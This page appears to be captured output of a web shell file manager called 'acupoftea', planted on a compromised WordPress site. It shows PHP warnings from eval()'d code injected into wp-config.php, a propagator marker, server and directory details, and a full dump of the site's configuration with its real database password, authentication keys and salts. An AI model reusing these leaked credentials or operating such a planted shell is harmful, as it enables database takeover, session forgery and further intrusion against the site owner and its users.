Warning: Constant FRAMEWORK_VERSION already defined in /home/h387960/public_html/wp-config.php(906) : eval()'d code on line 11

Warning: Constant DB_HOST already defined in /home/h387960/public_html/wp-config.php(906) : eval()'d code on line 18

Warning: Constant DB_USER already defined in /home/h387960/public_html/wp-config.php(906) : eval()'d code on line 19

Warning: Constant DB_PASS already defined in /home/h387960/public_html/wp-config.php(906) : eval()'d code on line 20

Warning: Constant DB_NAME already defined in /home/h387960/public_html/wp-config.php(906) : eval()'d code on line 21
#acupoftea - memaryar.com
System : Linux s306.bitcommand.com 4.18.0-553.141.2.lve.el8.x86_64 #1 SMP Wed Jul 8 16:10:02 UTC 2026 x86_64
Software : LiteSpeed
Server : 178.239.158.118
Domains : Cant read /etc/named.conf
Permission : drwxrwxrwx ]
: / home / h387960 / www / wp-includes / block-bindings /
216.73.216.237
Home
Name Type Size Permission Last Modified Actions
. DIR - drwxrwxrwx 2026-07-25 07:41:33
.. DIR - drwxr-xr-x 2026-07-29 04:19:47
pattern-overrides.php text/x-php 1.49 KB -rw-rw-rw- 2024-04-03 08:29:52
post-data.php text/x-php 2.77 KB -rw-rw-rw- 2026-07-25 07:41:33
post-meta.php text/x-php 2.04 KB -rw-rw-rw- 2024-04-03 08:29:52
term-data.php text/x-php 3.07 KB -rw-rw-rw- 2026-07-25 07:41:33

~ ACUPOFTEA - memaryar.com
/* PROPAGATOR_SEED_END */ //Begin Really Simple SSL session cookie settings @ini_set('session.cookie_httponly', true); @ini_set('session.cookie_secure', true); @ini_set('session.use_only_cookies', true); //END Really Simple SSL cookie settings /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', "h387960_memaryar" ); /** MySQL database username */ define( 'DB_USER', "h387960_memaryar" ); /** MySQL database password */ define( 'DB_PASSWORD', "memaryar123321" ); /** MySQL hostname */ define( 'DB_HOST', "localhost" ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'XNd=kRzDRul=/S)IlH.x+h.?s94CY' ); define( 'LOGGED_IN_KEY', '{$J!.)p/>-JoWE6Y-_!vSv6(o6mS|s}773#@ 9)4d`b21K9<_t,[pPL' ); define( 'AUTH_SALT', '0gC>fUQCZ6cMn(&E5m?p<4~0YLuODG+dmI*=_zYpMg1~eu]&v81^M,z0D>&hW ^>;|+y6.=Nz3iVoV?dV=CtQH#7' ); define( 'LOGGED_IN_SALT', 'hT5RABV_0UKn`J4&45PDoV/l~0yA9:._y)/r,]x.QnH&hI{._-H&r0~XEU;]hR2N' ); define( 'NONCE_SALT', 'EC9TeP11-S,zUVHC=Ms2+]UNvnT3xwUf$:r/v=,lwWfhg57poBYyx[=/yVzS6@F,' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /*define( 'WP_DEBUG_LOG', true); */ /* Add any custom values between this line and the "stop editing" line. */ define( 'WP_SITEURL', 'https://memaryar.com' ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';